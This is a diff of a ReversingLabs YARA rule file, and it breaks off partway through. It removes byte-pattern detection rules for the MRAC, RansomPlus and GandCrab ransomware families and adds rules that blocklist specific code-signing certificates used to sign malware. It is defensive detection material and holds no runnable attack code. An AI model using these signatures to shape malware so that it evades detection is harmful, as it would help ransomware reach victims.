+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "190dffc36c17c27c43337d7914683b7bab3ff18a50de5278ed2a66f04b9e395d"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $create_crypt_context ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aleman Ltd" and pe.signatures [ i ] . serial == "37:ca:4f:66:fd:cc:87:32:99:27:23:19:98:59:88:6c" and 1505952000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_MRAC : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Be2F22C152Bb218B898C4029056816A9 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects MRAC ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "135c3dc9-bf08-5f00-bade-7054d9f33830"
-		date = "2022-02-21"
-		modified = "2022-02-21"
+		id = "d5ca9d9d-e80f-56c1-90b7-ef931e61ba92"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.MRAC.yara#L1-L69"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "04e8364dc9c726f4bb2d3035e5b7e8dab4cae124b2f047be6f11b865fab557a7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16080-L16098"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cd99e4d97d9a60f409cf072bbae254486c307ae3cb6e34c5cd9648c972615f36"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MRAC"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ??
-            83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1
-            ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ??
-            ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ??
-            8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ??
-            ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8
-        }
-		$import_key = {
-            8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF
-            75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F
-            84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15
-            ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B
-            C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F
-            B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D
-            45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84
-            DB 74
-        }
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3
-            F6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B
-            4D ?? 6A ?? 68 ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) and 1676246400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ransomplus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Fc7065Abf8303Fb472B8Af85918F5C24 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RansomPlus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ee96eab6-104d-560f-adae-6d5f0ba5d469"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "1aebd2be-b22c-5102-a449-27025f61cce6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.RansomPlus.yara#L1-L95"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8ab18c6bcb939eac0e74f015dea773141b5086c5fcb4783666eeac1f395bc208"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16100-L16118"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f57ae32d7efd9cd4c0a207897e30b871dc32405c5b9ad844c9bb7eee4827cc5a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RansomPlus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_1_0 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 EC ??
-            8B CC 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 01 ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ??
-            ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ??
-            ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ??
-            68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$find_files_1_1 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8D 8D ?? ?? ?? ?? 51 50 FF 15 ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 95 ?? ?? ?? ??
-            41 81 F9 ?? ?? ?? ?? 72 ?? F6 C2 ?? 74 ?? E8 ?? ?? ?? ?? 8B 42 ?? 3B C2 72 ?? E8 ??
-            ?? ?? ?? 2B D0 83 FA ?? 73 ?? E8 ?? ?? ?? ?? 83 FA ?? 76 ?? E8 ?? ?? ?? ?? 8B D0 52
-            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 83 FB ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 32 DB E9 ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? C6 45 ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85
-        }
-		$find_files_1_2 = {
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB
-            ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 55 ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ??
-            8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1
-            6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D
-            ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 FE ?? 0F 43 C2 0F 43 CA 89 85 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 03 C1 83 FE ?? 8B F8 0F 43 DA 33 C9 2B FB 33 F6 3B D8 0F 47 F9 85
-            FF 74 ?? 0F BE 04 33 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 88 04 31 46 3B F7
-            75 ?? 33 C0 89 85 ?? ?? ?? ?? 8B 94 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D
-            71 ?? 8A 01 41 84 C0 75 ?? 2B CE 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 F9 ?? 0F
-            43 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 C2 03 85 ?? ?? ?? ?? 83 F9 ?? 8B F8
-            0F 43 DA 33 F6 2B FB 3B D8 0F 47 FE 85 FF 74
-        }
-		$encrypt_files = {
-            8A 01 41 84 C0 75 ?? 2B CA C6 85 ?? ?? ?? ?? ?? 33 C0 88 84 05 ?? ?? ?? ?? 40 3D ??
-            ?? ?? ?? 72 ?? 33 F6 8B C6 33 D2 F7 F1 8A 04 3A 02 C1 30 84 35 ?? ?? ?? ?? 46 81 FE
-            ?? ?? ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 55 ?? 8B F8 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            D8 85 FF 74 ?? 85 DB 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B F0 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 56 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
-            83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8
-            ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B
-            41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ??
-            E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D
-            ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ??
-            2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8
-            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B
-            C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ??
-            ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files_1_0 and $find_files_1_1 and $find_files_1_2 and $encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIG IN VISION SP Z O O" and ( pe.signatures [ i ] . serial == "00:fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" or pe.signatures [ i ] . serial == "fc:70:65:ab:f8:30:3f:b4:72:b8:af:85:91:8f:5c:24" ) and 1604361600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gandcrab : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_698Ff388Adb50B88Afb832E76B0A0Ad1 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GandCrab ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a09ed7e6-f3a6-5f44-9d5b-a9c529cf1190"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "8a6f4a15-08a5-5ca5-a743-55075726e744"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.GandCrab.yara#L1-L892"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "79381635681482fc90defe4e10e97bf16d534837518fc06ae579822e9d77b461"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16120-L16136"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b29bc69c8fd9543dba8f7d2a18d52b1bcbb8a8ae6f553d8b232ca74709b9addc"
 		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GandCrab"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F9 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 85 DB 74 ?? 33 C0
-            83 F8 ?? 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            57 FF 15 ?? ?? ?? ?? 8D 4D ?? 8D 34 45 ?? ?? ?? ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ??
-            8B D8 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? FF D6 57 53 FF D6
-            6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8B 35 ?? ?? ?? ?? 53 FF D6 33 FF 8D
-            85 ?? ?? ?? ?? 21 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 83 EC ??
-            FF 75 ?? 53 FF D6 8B 75 ?? 8D 4D ?? 50 53 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 85
-            C0 74 ?? 47 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 83 65 ?? ?? E8 ?? ?? ?? ?? 85 C0 74
-            ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection_v2 = {
-            55 8B EC 83 EC ?? 53 56 8B D9 89 55 ?? 57 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45
-            ?? ?? ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8
-            FF D6 89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15
-            ?? ?? ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F
-            7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
-            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF
-            15 ?? ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83
-            EC ?? 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 8B 75 ?? 8D 4D ?? 68 ?? ??
-            ?? ?? 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55
-            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89
-            01 EB ?? 33 FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ??
-            FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ??
-            ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$crypt_files = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 51 33 C0 89 4C 24 ?? 40 8B DA 50 51 50
-            83 EC ?? 89 5C 24 ?? 50 51 50 51 50 51 50 51 50 83 EC ?? 50 51 50 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8B
-            F8 03 F3 8D 4E ?? 8D 0C CF C1 E1 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 04 B7 8D 04 C5
-            ?? ?? ?? ?? 50 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 75 ?? 89 44 24 ?? 8D 0C F5 ?? ?? ?? ??
-            51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 0C DD ?? ?? ?? ?? 8B F8 51 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 8B D8 89 5C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ?? 56 FF
-            75 ?? 8D 0C 36 8B 35 ?? ?? ?? ?? 89 4C 24 ?? FF D6 8B 4C 24 ?? 8D 04 09 89 44 24 ??
-            8D 44 24 ?? 50 53 68 ?? ?? ?? ?? 51 FF 74 24 ?? FF D6 53 8B 1D ?? ?? ?? ?? FF D3 57
-            8B F0 FF D3 83 C0 ?? 8D 4C 24 ?? 03 C6 50 E8 ?? ?? ?? ?? 57 FF D3 40 8D 4C 24 ?? 50
-            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? FF D3 40 8D 4C 24 ?? 50 E8 ?? ?? ?? ?? 33 F6
-            89 44 24 ?? 8B CE 57 89 4C 24 ?? FF D3 85 C0 74 ?? 8B 54 24 ?? 89 54 24 ?? 8B 44 24
-            ?? 8A 0C 38 80 F9 ?? 74 ?? 80 F9 ?? 74 ?? 88 0A 42 89 54 24 ?? 40 57 89 44 24 ?? FF
-            D3 8B 4C 24 ?? 8B 54 24 ?? 3B C8 72 ?? 8B 7C 24 ?? 57 FF D3 85 C0 74 ?? 8B 4C 24 ??
-            89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C
-            24 ?? 3B F0 72 ?? 8B 7C 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 8B 35 ?? ??
-            ?? ?? 57 FF D6 8D 4C 24 ?? 8D 3C 47 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF
-            D6 FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34
-            47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 57 FF D3 8B 74 24 ?? 8B 1D ?? ?? ?? ?? 56 FF D3 C1 E0 ?? 8D 4C 24 ??
